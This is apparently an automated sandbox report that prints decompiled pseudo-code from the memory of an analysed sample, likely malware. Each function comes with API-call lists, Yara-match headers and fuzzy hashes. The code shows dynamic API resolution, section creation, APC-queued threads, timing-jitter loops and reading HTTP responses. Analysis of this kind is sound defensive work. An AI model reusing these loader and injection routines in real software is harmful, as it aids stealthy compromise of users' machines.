                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t33;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t36;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t39;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t42;
                                                                                                                                                                                                                                				intOrPtr _t46;
                                                                                                                                                                                                                                				struct HINSTANCE__* _t50;
                                                                                                                                                                                                                                				intOrPtr _t56;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t56 = E02B82020(0x20);
                                                                                                                                                                                                                                				if(_t56 == 0) {
                                                                                                                                                                                                                                					_v8 = 8;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t50 = GetModuleHandleA( *0x2b841c4 + 0x2b85014);
                                                                                                                                                                                                                                					_v8 = 0x7f;
                                                                                                                                                                                                                                					_t29 = GetProcAddress(_t50,  *0x2b841c4 + 0x2b85151);
                                                                                                                                                                                                                                					 *(_t56 + 0xc) = _t29;
                                                                                                                                                                                                                                					if(_t29 == 0) {
                                                                                                                                                                                                                                						L8:
                                                                                                                                                                                                                                						E02B81F0A(_t56);
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t33 = GetProcAddress(_t50,  *0x2b841c4 + 0x2b85161);
                                                                                                                                                                                                                                						 *(_t56 + 0x10) = _t33;
                                                                                                                                                                                                                                						if(_t33 == 0) {
                                                                                                                                                                                                                                							goto L8;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t36 = GetProcAddress(_t50,  *0x2b841c4 + 0x2b85174);
                                                                                                                                                                                                                                							 *(_t56 + 0x14) = _t36;
                                                                                                                                                                                                                                							if(_t36 == 0) {
                                                                                                                                                                                                                                								goto L8;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t39 = GetProcAddress(_t50,  *0x2b841c4 + 0x2b85189);
                                                                                                                                                                                                                                								 *(_t56 + 0x18) = _t39;
                                                                                                                                                                                                                                								if(_t39 == 0) {
                                                                                                                                                                                                                                									goto L8;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									_t42 = GetProcAddress(_t50,  *0x2b841c4 + 0x2b8519f);
                                                                                                                                                                                                                                									 *(_t56 + 0x1c) = _t42;
                                                                                                                                                                                                                                									if(_t42 == 0) {
                                                                                                                                                                                                                                										goto L8;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                                                                                                                                                                                                                										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                                                                                                                                                                                                                										_t46 = E02B812E2(_t56, _a12); // executed
                                                                                                                                                                                                                                										_v8 = _t46;
                                                                                                                                                                                                                                										if(_t46 != 0) {
                                                                                                                                                                                                                                											goto L8;
                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                											 *_a16 = _t56;
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _v8;
                                                                                                                                                                                                                                			}













                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02B82020: HeapAlloc.KERNEL32(00000000,?,02B81593,00000030,747863F0,00000000), ref: 02B8202C
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,02B81FB8,?,?,?,?,?,00000002,?,?), ref: 02B81C85
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 02B81CA7
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 02B81CBD
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 02B81CD3
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 02B81CE9
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 02B81CFF
                                                                                                                                                                                                                                  • Part of subcall function 02B812E2: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,?), ref: 02B8133F
                                                                                                                                                                                                                                  • Part of subcall function 02B812E2: memset.NTDLL ref: 02B81361
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1632424568-0
                                                                                                                                                                                                                                • Opcode ID: ebfdbbf4cb0a00c75852732563325cb07dbbdbba5e1a43522c299b28e8088e99
                                                                                                                                                                                                                                • Instruction ID: aaa9d37d2561f0f6cb8cbbec3d146c14fefe44bf8f4af336b025075338ff46c6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ebfdbbf4cb0a00c75852732563325cb07dbbdbba5e1a43522c299b28e8088e99
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80214D74A0160BAFC721EF79DC84A6AB7FCEF0434470248A5E90DD7241E770EA02CB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                                                                                                			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				void* __ebp;
                                                                                                                                                                                                                                				char _t9;
                                                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                                                				void* _t18;
                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                				void* _t36;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                				_t9 = _a8;
                                                                                                                                                                                                                                				_v8 = 1;
                                                                                                                                                                                                                                				if(_t9 == 0) {
                                                                                                                                                                                                                                					_t10 = InterlockedDecrement(0x2b84188);
                                                                                                                                                                                                                                					__eflags = _t10;
                                                                                                                                                                                                                                					if(_t10 == 0) {
                                                                                                                                                                                                                                						__eflags =  *0x2b8418c;
                                                                                                                                                                                                                                						if( *0x2b8418c != 0) {
                                                                                                                                                                                                                                							_t36 = 0x2328;
                                                                                                                                                                                                                                							while(1) {
                                                                                                                                                                                                                                								SleepEx(0x64, 1);
                                                                                                                                                                                                                                								__eflags =  *0x2b84198;
                                                                                                                                                                                                                                								if( *0x2b84198 == 0) {
                                                                                                                                                                                                                                									break;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								_t36 = _t36 - 0x64;
                                                                                                                                                                                                                                								__eflags = _t36;
                                                                                                                                                                                                                                								if(_t36 > 0) {
                                                                                                                                                                                                                                									continue;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								break;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							CloseHandle( *0x2b8418c);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						HeapDestroy( *0x2b84190);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					if(_t9 == 1 && InterlockedIncrement(0x2b84188) == 1) {
                                                                                                                                                                                                                                						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                                                                						 *0x2b84190 = _t18;
                                                                                                                                                                                                                                						_t41 = _t18;
                                                                                                                                                                                                                                						if(_t18 == 0) {
                                                                                                                                                                                                                                							L6:
                                                                                                                                                                                                                                							_v8 = 0;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							 *0x2b841b0 = _a4;
                                                                                                                                                                                                                                							asm("lock xadd [eax], edi");
                                                                                                                                                                                                                                							_t23 = E02B81000(E02B81EB4, E02B81971(_a12, 1, 0x2b84198, _t41),  &_a8);
                                                                                                                                                                                                                                							 *0x2b8418c = _t23;
                                                                                                                                                                                                                                							if(_t23 == 0) {
                                                                                                                                                                                                                                								asm("lock xadd [esi], eax");
                                                                                                                                                                                                                                								goto L6;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _v8;
                                                                                                                                                                                                                                			}













                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(02B84188), ref: 02B813EE
                                                                                                                                                                                                                                • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 02B81403
                                                                                                                                                                                                                                  • Part of subcall function 02B81000: CreateThread.KERNEL32 ref: 02B81017
                                                                                                                                                                                                                                  • Part of subcall function 02B81000: QueueUserAPC.KERNEL32(?,00000000,?), ref: 02B8102C
                                                                                                                                                                                                                                  • Part of subcall function 02B81000: GetLastError.KERNEL32(00000000), ref: 02B81037
                                                                                                                                                                                                                                  • Part of subcall function 02B81000: TerminateThread.KERNEL32(00000000,00000000), ref: 02B81041
                                                                                                                                                                                                                                  • Part of subcall function 02B81000: CloseHandle.KERNEL32(00000000), ref: 02B81048
                                                                                                                                                                                                                                  • Part of subcall function 02B81000: SetLastError.KERNEL32(00000000), ref: 02B81051
                                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(02B84188), ref: 02B81456
                                                                                                                                                                                                                                • SleepEx.KERNEL32(00000064,00000001), ref: 02B81470
                                                                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 02B8148C
                                                                                                                                                                                                                                • HeapDestroy.KERNEL32 ref: 02B81498
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2110400756-0
                                                                                                                                                                                                                                • Opcode ID: 962e526535652570e6a2cb2282d7aad283a32de76f2616264349efe7cfca607f
                                                                                                                                                                                                                                • Instruction ID: e3499da7181fef62926ddb52a79e7ff1aa09424d35eded8e0bc2c13d8043e536
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 962e526535652570e6a2cb2282d7aad283a32de76f2616264349efe7cfca607f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00218E31E92206AFD710BFADEC84B697FB8EB54AA471848A5F50DF3110E3308961CF50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                			E02BB4D07(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                				struct _FILETIME _v12;
                                                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                                                				int _t14;
                                                                                                                                                                                                                                				signed int _t16;
                                                                                                                                                                                                                                				void* _t18;
                                                                                                                                                                                                                                				signed int _t19;
                                                                                                                                                                                                                                				unsigned int _t23;
                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                				signed int _t34;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t27 = __edx;
                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                                                                				 *0x2bbd270 = _t10;
                                                                                                                                                                                                                                				if(_t10 != 0) {
                                                                                                                                                                                                                                					 *0x2bbd160 = GetTickCount();
                                                                                                                                                                                                                                					_t12 = E02BB6246(_a4);
                                                                                                                                                                                                                                					if(_t12 == 0) {
                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                							GetSystemTimeAsFileTime( &_v12);
                                                                                                                                                                                                                                							_t14 = SwitchToThread();
                                                                                                                                                                                                                                							_t23 = _v12.dwHighDateTime;
                                                                                                                                                                                                                                							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                							_push(0x13);
                                                                                                                                                                                                                                							_push(_t23 >> 5);
                                                                                                                                                                                                                                							_push(_t16);
                                                                                                                                                                                                                                							L02BBB01E();
                                                                                                                                                                                                                                							_t34 = _t14 + _t16;
                                                                                                                                                                                                                                							_t18 = E02BB120C(_a4, _t34);
                                                                                                                                                                                                                                							_t19 = 3;
                                                                                                                                                                                                                                							_t26 = _t34 & 0x00000007;
                                                                                                                                                                                                                                							Sleep(_t19 << (_t34 & 0x00000007)); // executed
                                                                                                                                                                                                                                						} while (_t18 == 1);
                                                                                                                                                                                                                                						if(E02BB75DD(_t26) != 0) {
                                                                                                                                                                                                                                							 *0x2bbd298 = 1; // executed
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t12 = E02BB5701(_t27); // executed
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t12 = 8;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t12;
                                                                                                                                                                                                                                			}














                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,02BB5992,?), ref: 02BB4D1A
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02BB4D2E
                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,02BB5992,?), ref: 02BB4D4A
                                                                                                                                                                                                                                • SwitchToThread.KERNEL32(?,00000001,?,?,?,02BB5992,?), ref: 02BB4D50
                                                                                                                                                                                                                                • _aullrem.NTDLL(?,?,00000013,00000000), ref: 02BB4D6D
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,02BB5992,?), ref: 02BB4D8A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 507476733-0
                                                                                                                                                                                                                                • Opcode ID: 00fc3d8695dc6090b7348dfc24b283c6fa97f1ca8d9588e9ac843d84993fb230
                                                                                                                                                                                                                                • Instruction ID: 8f3012de977a2519dfa9a69ad37dc98c63fbadd356cdef977e4eca3ed56ec508
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00fc3d8695dc6090b7348dfc24b283c6fa97f1ca8d9588e9ac843d84993fb230
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1011CA72E902056FD7129B64DC19BAA7BADEF44395F400566FA45C7180EBF4D810CA61
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 61%
                                                                                                                                                                                                                                			E02BB202A(void* __eax) {
                                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                                                				void* _v24;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				char* _t40;
                                                                                                                                                                                                                                				long _t41;
                                                                                                                                                                                                                                				void* _t44;
                                                                                                                                                                                                                                				intOrPtr _t45;
                                                                                                                                                                                                                                				intOrPtr* _t46;
                                                                                                                                                                                                                                				char _t48;
                                                                                                                                                                                                                                				long _t52;
                                                                                                                                                                                                                                				char* _t53;
                                                                                                                                                                                                                                				long _t54;
                                                                                                                                                                                                                                				intOrPtr* _t55;
                                                                                                                                                                                                                                				void* _t64;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t64 = __eax;
                                                                                                                                                                                                                                				_t40 =  &_v12;
                                                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                                                				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40); // executed
                                                                                                                                                                                                                                				if(_t40 == 0) {
                                                                                                                                                                                                                                					_t41 = GetLastError();
                                                                                                                                                                                                                                					_v8 = _t41;
                                                                                                                                                                                                                                					if(_t41 != 0x2efe) {
                                                                                                                                                                                                                                						L26:
                                                                                                                                                                                                                                						return _v8;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_v8 = 0;
                                                                                                                                                                                                                                					L25:
                                                                                                                                                                                                                                					 *((intOrPtr*)(_t64 + 0x30)) = 0;
                                                                                                                                                                                                                                					goto L26;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_v12 == 0) {
                                                                                                                                                                                                                                					goto L25;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t44 =  *0x2bbd130(0, 1,  &_v24); // executed
                                                                                                                                                                                                                                				if(_t44 != 0) {
                                                                                                                                                                                                                                					_v8 = 8;
                                                                                                                                                                                                                                					goto L26;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t45 = E02BB5157(0x1000);
                                                                                                                                                                                                                                				_v20 = _t45;
                                                                                                                                                                                                                                				if(_t45 == 0) {
                                                                                                                                                                                                                                					_v8 = 8;
                                                                                                                                                                                                                                					L21:
                                                                                                                                                                                                                                					_t46 = _v24;
                                                                                                                                                                                                                                					 *((intOrPtr*)( *_t46 + 8))(_t46);
                                                                                                                                                                                                                                					goto L26;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					goto L4;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				do {
                                                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                                                						L4:
                                                                                                                                                                                                                                						_t48 = _v12;
                                                                                                                                                                                                                                						if(_t48 >= 0x1000) {
                                                                                                                                                                                                                                							_t48 = 0x1000;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
                                                                                                                                                                                                                                						if(_t48 == 0) {
                                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t55 = _v24;
                                                                                                                                                                                                                                						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
                                                                                                                                                                                                                                						_t17 =  &_v12;
                                                                                                                                                                                                                                						 *_t17 = _v12 - _v16;
                                                                                                                                                                                                                                						if( *_t17 != 0) {
                                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						L10:
                                                                                                                                                                                                                                						if(WaitForSingleObject( *0x2bbd2a4, 0) != 0x102) {
                                                                                                                                                                                                                                							_v8 = 0x102;
                                                                                                                                                                                                                                							L18:
                                                                                                                                                                                                                                							E02BB53BB(_v20);
                                                                                                                                                                                                                                							if(_v8 == 0) {
                                                                                                                                                                                                                                								_t52 = E02BB50DE(_v24, _t64); // executed
                                                                                                                                                                                                                                								_v8 = _t52;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							goto L21;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t53 =  &_v12;
                                                                                                                                                                                                                                						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53); // executed
                                                                                                                                                                                                                                						if(_t53 != 0) {
                                                                                                                                                                                                                                							goto L15;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t54 = GetLastError();
                                                                                                                                                                                                                                						_v8 = _t54;
                                                                                                                                                                                                                                						if(_t54 != 0x2f78 || _v12 != 0) {
                                                                                                                                                                                                                                							goto L18;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_v8 = 0;
                                                                                                                                                                                                                                							goto L15;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_v8 = GetLastError();
                                                                                                                                                                                                                                					goto L10;
                                                                                                                                                                                                                                					L15:
                                                                                                                                                                                                                                				} while (_v12 != 0);
                                                                                                                                                                                                                                				goto L18;
                                                                                                                                                                                                                                			}





















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BB214A
                                                                                                                                                                                                                                  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BB20BE
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000), ref: 02BB20CE
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BB20EE
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$AllocateHeapObjectSingleWait
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 35602742-1701360479
                                                                                                                                                                                                                                • Opcode ID: 5765ed8dbac8939d09885b204f76c999746e265bf23d1d2d35169993636dc229
                                                                                                                                                                                                                                • Instruction ID: 30affee0652f827c292cef16414207f483c29ccbc55974206608face33d15476
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5765ed8dbac8939d09885b204f76c999746e265bf23d1d2d35169993636dc229
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4141A875D00209EFDF12DFA4C984AFEBBB9FF04345B5044AAE902E7250D7B09A84DB61
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                                                                                                			E02BB45CF(void** __esi) {
                                                                                                                                                                                                                                				intOrPtr _v0;
                                                                                                                                                                                                                                				intOrPtr _t4;
                                                                                                                                                                                                                                				intOrPtr _t6;
                                                                                                                                                                                                                                				void* _t8;
                                                                                                                                                                                                                                				void* _t9;
                                                                                                                                                                                                                                				intOrPtr _t10;
                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                				void** _t13;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t13 = __esi;
                                                                                                                                                                                                                                				_t4 =  *0x2bbd364; // 0x52f95b0
                                                                                                                                                                                                                                				__imp__(_t4 + 0x40);
                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                					_t6 =  *0x2bbd364; // 0x52f95b0
                                                                                                                                                                                                                                					_t1 = _t6 + 0x58; // 0x0
                                                                                                                                                                                                                                					if( *_t1 == 0) {
                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					Sleep(0xa);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t8 =  *_t13;
                                                                                                                                                                                                                                				if(_t8 != 0 && _t8 != 0x2bbd030) {
                                                                                                                                                                                                                                					HeapFree( *0x2bbd270, 0, _t8);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t9 = E02BB5341(_v0, _t13); // executed
                                                                                                                                                                                                                                				_t13[1] = _t9;
                                                                                                                                                                                                                                				_t10 =  *0x2bbd364; // 0x52f95b0
                                                                                                                                                                                                                                				_t11 = _t10 + 0x40;
                                                                                                                                                                                                                                				__imp__(_t11);
                                                                                                                                                                                                                                				return _t11;
                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(052F9570), ref: 02BB45D8
                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A,?,02BB5884), ref: 02BB45E2
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,02BB5884), ref: 02BB460A
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(052F9570), ref: 02BB4626
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 58946197-1536154274
                                                                                                                                                                                                                                • Opcode ID: e131def47b44d62876c752a88080aeb0bb749ae656239c00c8a4b2f54aee7fd7
                                                                                                                                                                                                                                • Instruction ID: 7fa5a9be8eed14682a8fe762831bf9b35bd44cf0b8d8b160b04eb8405d97d5ee
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e131def47b44d62876c752a88080aeb0bb749ae656239c00c8a4b2f54aee7fd7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84F03A70E842429FDB278F64EA49B663BB4FF00380B008855F502C7252C3A4E820CB29
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 57%
                                                                                                                                                                                                                                			E02BB5701(signed int __edx) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				long _v12;
                                                                                                                                                                                                                                				CHAR* _v16;
                                                                                                                                                                                                                                				long _v20;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				void* _t21;
                                                                                                                                                                                                                                				CHAR* _t22;
                                                                                                                                                                                                                                				CHAR* _t25;
                                                                                                                                                                                                                                				intOrPtr _t26;
                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                				void* _t31;
                                                                                                                                                                                                                                				void* _t32;
                                                                                                                                                                                                                                				CHAR* _t36;
                                                                                                                                                                                                                                				CHAR* _t42;
                                                                                                                                                                                                                                				CHAR* _t43;
                                                                                                                                                                                                                                				CHAR* _t44;
                                                                                                                                                                                                                                				void* _t49;
                                                                                                                                                                                                                                				void* _t51;
                                                                                                                                                                                                                                				CHAR* _t54;
                                                                                                                                                                                                                                				signed char _t56;
                                                                                                                                                                                                                                				intOrPtr _t58;
                                                                                                                                                                                                                                				signed int _t59;
                                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                                				CHAR* _t65;
                                                                                                                                                                                                                                				CHAR* _t66;
                                                                                                                                                                                                                                				char* _t67;
                                                                                                                                                                                                                                				void* _t68;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t61 = __edx;
                                                                                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                                                				_t21 = E02BB2CC9();
                                                                                                                                                                                                                                				if(_t21 != 0) {
                                                                                                                                                                                                                                					_t59 =  *0x2bbd294; // 0x4000000a
                                                                                                                                                                                                                                					_t55 = (_t59 & 0xf0000000) + _t21;
                                                                                                                                                                                                                                					 *0x2bbd294 = (_t59 & 0xf0000000) + _t21;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t22 =  *0x2bbd12c(0, 2); // executed
                                                                                                                                                                                                                                				_v16 = _t22;
                                                                                                                                                                                                                                				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                                                                                                                                                                                                					_t25 = E02BB2A45( &_v8,  &_v20); // executed
                                                                                                                                                                                                                                					_t54 = _t25;
                                                                                                                                                                                                                                					_t26 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                					if( *0x2bbd294 > 5) {
                                                                                                                                                                                                                                						_t8 = _t26 + 0x2bbe5cd; // 0x4d283a53
                                                                                                                                                                                                                                						_t27 = _t8;
                                                                                                                                                                                                                                					} else {
